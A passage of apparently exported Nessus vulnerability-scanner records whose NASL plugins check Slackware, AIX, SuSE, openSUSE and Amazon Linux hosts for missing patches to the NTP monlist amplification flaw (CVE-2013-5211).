(isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Slackware\", cpu);\n\n\nflag = 0;\nif (slackware_check(osver:\"13.0\", pkgname:\"ntp\", pkgver:\"4.2.6p5\", pkgarch:\"i486\", pkgnum:\"1_slack13.0\")) flag++;\nif (slackware_check(osver:\"13.0\", arch:\"x86_64\", pkgname:\"ntp\", pkgver:\"4.2.6p5\", pkgarch:\"x86_64\", pkgnum:\"1_slack13.0\")) flag++;\n\nif (slackware_check(osver:\"13.1\", pkgname:\"ntp\", pkgver:\"4.2.6p5\", pkgarch:\"i486\", pkgnum:\"1_slack13.1\")) flag++;\nif (slackware_check(osver:\"13.1\", arch:\"x86_64\", pkgname:\"ntp\", pkgver:\"4.2.6p5\", pkgarch:\"x86_64\", pkgnum:\"1_slack13.1\")) flag++;\n\nif (slackware_check(osver:\"13.37\", pkgname:\"ntp\", 
pkgver:\"4.2.6p5\", pkgarch:\"i486\", pkgnum:\"1_slack13.37\")) flag++;\nif (slackware_check(osver:\"13.37\", arch:\"x86_64\", pkgname:\"ntp\", pkgver:\"4.2.6p5\", pkgarch:\"x86_64\", pkgnum:\"1_slack13.37\")) flag++;\n\nif (slackware_check(osver:\"14.0\", pkgname:\"ntp\", pkgver:\"4.2.6p5\", pkgarch:\"i486\", pkgnum:\"3_slack14.0\")) flag++;\nif (slackware_check(osver:\"14.0\", arch:\"x86_64\", pkgname:\"ntp\", pkgver:\"4.2.6p5\", pkgarch:\"x86_64\", pkgnum:\"3_slack14.0\")) flag++;\n\nif (slackware_check(osver:\"14.1\", pkgname:\"ntp\", pkgver:\"4.2.6p5\", pkgarch:\"i486\", pkgnum:\"5_slack14.1\")) flag++;\nif (slackware_check(osver:\"14.1\", arch:\"x86_64\", pkgname:\"ntp\", pkgver:\"4.2.6p5\", pkgarch:\"x86_64\", pkgnum:\"5_slack14.1\")) flag++;\n\nif (slackware_check(osver:\"current\", pkgname:\"ntp\", pkgver:\"4.2.6p5\", pkgarch:\"i486\", pkgnum:\"5\")) flag++;\nif (slackware_check(osver:\"current\", arch:\"x86_64\", pkgname:\"ntp\", pkgver:\"4.2.6p5\", pkgarch:\"x86_64\", pkgnum:\"5\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:slackware_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:21:17", "description": "The monlist feature in ntpd in NTP allows remote attackers to cause a denial of service (traffic amplification) via forged (1) REQ_MON_GETLIST or (2) REQ_MON_GETLIST_1 requests.", "cvss3": {}, "published": "2014-06-17T00:00:00", "type": "nessus", "title": "AIX 6.1 TL 9 : ntp (IV56213)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-5211"], "modified": "2023-04-21T00:00:00", "cpe": ["cpe:/o:ibm:aix:6.1"], "id": "AIX_IV56213.NASL", "href": "https://www.tenable.com/plugins/nessus/76075", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The text in the description was extracted from AIX Security\n# Advisory 
ntp_advisory.asc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(76075);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/21\");\n\n script_cve_id(\"CVE-2013-5211\");\n\n script_name(english:\"AIX 6.1 TL 9 : ntp (IV56213)\");\n script_summary(english:\"Check for APAR IV56213\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote AIX host is missing a security patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The monlist feature in ntpd in NTP allows remote attackers to cause a\ndenial of service (traffic amplification) via forged (1)\nREQ_MON_GETLIST or (2) REQ_MON_GETLIST_1 requests.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://aix.software.ibm.com/aix/efixes/security/ntp_advisory.asc\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Install the appropriate interim fix.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:ibm:aix:6.1\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/06/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/06/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/17\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2023 Tenable Network Security, Inc.\");\n script_family(english:\"AIX Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/AIX/lslpp\", \"Host/local_checks_enabled\", \"Host/AIX/version\");\n\n exit(0);\n}\n\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"aix.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! 
get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif ( ! get_kb_item(\"Host/AIX/version\") ) audit(AUDIT_OS_NOT, \"AIX\");\nif ( ! get_kb_item(\"Host/AIX/lslpp\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nif ( get_kb_item(\"Host/AIX/emgr_failure\" ) ) exit(0, \"This iFix check is disabled because : \"+get_kb_item(\"Host/AIX/emgr_failure\") );\n\nflag = 0;\n\nif (aix_check_ifix(release:\"6.1\", ml:\"09\", sp:\"02\", patch:\"IV56213s1a\", package:\"bos.net.tcp.client\", minfilesetver:\"6.1.9.0\", maxfilesetver:\"6.1.9.1\") < 0) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:aix_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:22:25", "description": "The NTP time service could have been used for remote denial of service amplification attacks.\n\nThis issue can be fixed by the administrator as we described in our security advisory SUSE-SA:2014:001:\nhttp://lists.opensuse.org/opensuse-security-announce/2014-01/msg00005.\nhtml\n\nand on\n\nhttp://support.novell.com/security/cve/CVE-2013-5211.html\n\nThis update now also replaces the default ntp.conf template to fix this problem.\n\nPlease note that if you have touched or modified ntp.conf yourself, it will not be automatically fixed, you need to merge the changes manually as described.\n\nAdditionally the following bug has been fixed :\n\n - ntp start script does not update the /var/lib/ntp/etc/localtime file if /etc/localtime is a symlink (bnc#838458)", "cvss3": {}, "published": "2014-07-30T00:00:00", "type": "nessus", "title": "SuSE 11.3 Security Update : ntp (SAT Patch Number 9540)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-5211"], "modified": "2021-01-19T00:00:00", "cpe": ["cpe:/o:novell:suse_linux:11", "p-cpe:/a:novell:suse_linux:11:ntp", "p-cpe:/a:novell:suse_linux:11:ntp-doc"], "id": 
"SUSE_11_NTP-140721.NASL", "href": "https://www.tenable.com/plugins/nessus/76910", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from SuSE 11 update information. The text itself is\n# copyright (C) Novell, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(76910);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2013-5211\");\n\n script_name(english:\"SuSE 11.3 Security Update : ntp (SAT Patch Number 9540)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 11 host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The NTP time service could have been used for remote denial of service\namplification attacks.\n\nThis issue can be fixed by the administrator as we described in our\nsecurity advisory SUSE-SA:2014:001:\nhttp://lists.opensuse.org/opensuse-security-announce/2014-01/msg00005.\nhtml\n\nand on\n\nhttp://support.novell.com/security/cve/CVE-2013-5211.html\n\nThis update now also replaces the default ntp.conf template to fix\nthis problem.\n\nPlease note that if you have touched or modified ntp.conf yourself, it\nwill not be automatically fixed, you need to merge the changes\nmanually as described.\n\nAdditionally the following bug has been fixed :\n\n - ntp start script does not update the\n /var/lib/ntp/etc/localtime file if /etc/localtime is a\n symlink (bnc#838458)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=838458\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=857195\"\n );\n 
script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-5211.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply SAT patch number 9540.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:ntp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:ntp-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/07/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/07/30\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)11\") audit(AUDIT_OS_NOT, \"SuSE 11\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SuSE 11\", cpu);\n\npl = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(pl) || int(pl) != 3) audit(AUDIT_OS_NOT, \"SuSE 11.3\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"i586\", 
reference:\"ntp-4.2.4p8-1.24.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"i586\", reference:\"ntp-doc-4.2.4p8-1.24.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"x86_64\", reference:\"ntp-4.2.4p8-1.24.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"x86_64\", reference:\"ntp-doc-4.2.4p8-1.24.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, reference:\"ntp-4.2.4p8-1.24.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, reference:\"ntp-doc-4.2.4p8-1.24.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:22:42", "description": "The NTP time service could be used for remote denial of service amplification attacks.\n\nThis issue can be fixed by the administrator as we described in our security advisory SUSE-SA:2014:001 http://lists.opensuse.org/opensuse-security-announce/2014-01/msg00005.\nhtml\n\nand on http://support.novell.com/security/cve/CVE-2013-5211.html\n\nThis update now also replaces the default ntp.conf template to fix this problem.\n\nPlease note that if you have touched or modified ntp.conf yourself, it will not be automatically fixed, you need to merge the changes manually as described.", "cvss3": {}, "published": "2014-08-01T00:00:00", "type": "nessus", "title": "openSUSE Security Update : ntp (openSUSE-2014-474)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-5211"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:ntp", "p-cpe:/a:novell:opensuse:ntp-debuginfo", "p-cpe:/a:novell:opensuse:ntp-debugsource", "cpe:/o:novell:opensuse:12.3", "cpe:/o:novell:opensuse:13.1"], "id": "OPENSUSE-2014-474.NASL", "href": "https://www.tenable.com/plugins/nessus/76958", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive 
text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2014-474.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(76958);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2013-5211\");\n\n script_name(english:\"openSUSE Security Update : ntp (openSUSE-2014-474)\");\n script_summary(english:\"Check for the openSUSE-2014-474 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The NTP time service could be used for remote denial of service\namplification attacks.\n\nThis issue can be fixed by the administrator as we described in our\nsecurity advisory SUSE-SA:2014:001\nhttp://lists.opensuse.org/opensuse-security-announce/2014-01/msg00005.\nhtml\n\nand on http://support.novell.com/security/cve/CVE-2013-5211.html\n\nThis update now also replaces the default ntp.conf template to fix\nthis problem.\n\nPlease note that if you have touched or modified ntp.conf yourself, it\nwill not be automatically fixed, you need to merge the changes\nmanually as described.\"\n );\n # http://lists.opensuse.org/opensuse-security-announce/2014-01/msg00005.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?f2d7bb0e\"\n );\n # http://support.novell.com/security/cve/CVE-2013-5211.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2013-5211/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=857195\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected ntp packages.\");\n 
script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ntp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ntp-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ntp-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:12.3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/07/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/08/01\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE12\\.3|SUSE13\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"12.3 / 13.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE12.3\", reference:\"ntp-4.2.6p5-9.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", 
reference:\"ntp-debuginfo-4.2.6p5-9.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"ntp-debugsource-4.2.6p5-9.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"ntp-4.2.6p5-15.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"ntp-debuginfo-4.2.6p5-15.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"ntp-debugsource-4.2.6p5-15.5.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ntp\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:33:28", "description": "The version of ntp installed on the remote host is prior to 4.2.8p15-3. It is, therefore, affected by a vulnerability as referenced in the ALAS2-2021-1706 advisory.\n\n - The monlist feature in ntp_request.c in ntpd in NTP before 4.2.7p26 allows remote attackers to cause a denial of service (traffic amplification) via forged (1) REQ_MON_GETLIST or (2) REQ_MON_GETLIST_1 requests, as exploited in the wild in December 2013. 
(CVE-2013-5211)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2021-09-16T00:00:00", "type": "nessus", "title": "Amazon Linux 2 : ntp (ALAS-2021-1706)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-5211"], "modified": "2021-09-20T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:ntp", "p-cpe:/a:amazon:linux:ntp-debuginfo", "p-cpe:/a:amazon:linux:ntp-doc", "p-cpe:/a:amazon:linux:ntp-perl", "p-cpe:/a:amazon:linux:ntpdate", "p-cpe:/a:amazon:linux:sntp", "cpe:/o:amazon:linux:2"], "id": "AL2_ALAS-2021-1706.NASL", "href": "https://www.tenable.com/plugins/nessus/153422", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux 2 Security Advisory ALAS-2021-1706.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(153422);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/09/20\");\n\n script_cve_id(\"CVE-2013-5211\");\n script_xref(name:\"ALAS\", value:\"2021-1706\");\n\n script_name(english:\"Amazon Linux 2 : ntp (ALAS-2021-1706)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Amazon Linux 2 host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of ntp installed on the remote host is prior to 4.2.8p15-3. It is, therefore, affected by a vulnerability as\nreferenced in the ALAS2-2021-1706 advisory.\n\n - The monlist feature in ntp_request.c in ntpd in NTP before 4.2.7p26 allows remote attackers to cause a\n denial of service (traffic amplification) via forged (1) REQ_MON_GETLIST or (2) REQ_MON_GETLIST_1\n requests, as exploited in the wild in December 2013. 
(CVE-2013-5211)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/AL2/ALAS-2021-1706.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2013-5211\");\n script_set_attribute(attribute:\"solution\", value:\n\"Run 'yum update ntp' to update your system.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2013-5211\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/12/30\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/09/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/09/16\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:ntp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:ntp-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:ntp-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:ntp-perl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:ntpdate\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:sntp\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux:2\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nvar release = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nvar os_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nvar os_ver = os_ver[1];\nif (os_ver != \"2\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux 2\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar pkgs = [\n {'reference':'ntp-4.2.8p15-3.amzn2.0.4', 'cpu':'aarch64', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'ntp-4.2.8p15-3.amzn2.0.4', 'cpu':'i686', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'ntp-4.2.8p15-3.amzn2.0.4', 'cpu':'x86_64', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'ntp-debuginfo-4.2.8p15-3.amzn2.0.4', 'cpu':'aarch64', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'ntp-debuginfo-4.2.8p15-3.amzn2.0.4', 'cpu':'i686', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'ntp-debuginfo-4.2.8p15-3.amzn2.0.4', 'cpu':'x86_64', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'ntp-doc-4.2.8p15-3.amzn2.0.4', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'ntp-perl-4.2.8p15-3.amzn2.0.4', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'ntpdate-4.2.8p15-3.amzn2.0.4', 'cpu':'aarch64', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'ntpdate-4.2.8p15-3.amzn2.0.4', 'cpu':'i686', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE},\n 
{'reference':'ntpdate-4.2.8p15-3.amzn2.0.4', 'cpu':'x86_64', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'sntp-4.2.8p15-3.amzn2.0.4', 'cpu':'aarch64', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'sntp-4.2.8p15-3.amzn2.0.4', 'cpu':'i686', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'sntp-4.2.8p15-3.amzn2.0.4', 'cpu':'x86_64', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE}\n];\n\nvar flag = 0;\nforeach package_array ( pkgs ) {\n var reference = NULL;\n var release = NULL;\n var cpu = NULL;\n var el_string = NULL;\n var rpm_spec_vers_cmp = NULL;\n var allowmaj = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = package_array['release'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['el_string'])) el_string = package_array['el_string'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (!empty_or_null(package_array['allowmaj'])) allowmaj = package_array['allowmaj'];\n if (reference && release) {\n if (rpm_check(release:release, cpu:cpu, reference:reference, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ntp / ntp-debuginfo / ntp-doc / etc\");\n}", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:22:52", "description": "The NTP time service could be used for remote denial of service amplification attacks.\n\nThis issue can be fixed by the administrator as we described in our security advisory SUSE-SA:2014:001 
http://lists.opensuse.org/opensuse-security-announce/2014-01/msg00005.\nhtml\n\nand on http://support.novell.com/security/cve/CVE-2013-5211.html\n\nThis update now also replaces the default ntp.conf template to fix this problem.\n\nPlease note that if you have touched or modified ntp.conf yourself, it will not be automatically fixed, you need to merge the changes manually as described.", "cvss3": {}, "published": "2014-07-31T00:00:00", "type": "nessus", "title": "openSUSE Security Update : openSUSE-2014- (openSUSE-2014--1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-5211"], "modified": "2014-08-08T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:ntp", "p-cpe:/a:novell:opensuse:ntp-debuginfo", "p-cpe:/a:novell:opensuse:ntp-debugsource", "cpe:/o:novell:opensuse:13.1"], "id": "SUSE_13_1_OPENSUSE-2014--140722.NASL", "href": "https://www.tenable.com/plugins/nessus/76933", "sourceData": "#%NASL_MIN_LEVEL 999999\n\n# @DEPRECATED@\n#\n# This script has been deprecated as the associated patch is not\n# currently a security fix.\n#\n# Disabled on 2014/08/08.\n#\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2014--1.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(76933);\n script_version(\"1.3\");\n script_cvs_date(\"Date: 2018/07/20 0:18:55\");\n\n script_cve_id(\"CVE-2013-5211\");\n\n script_name(english:\"openSUSE Security Update : openSUSE-2014- (openSUSE-2014--1)\");\n script_summary(english:\"Check for the openSUSE-2014--1 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The NTP time service could be used for remote denial of service\namplification attacks.\n\nThis issue can be fixed by the administrator as we 
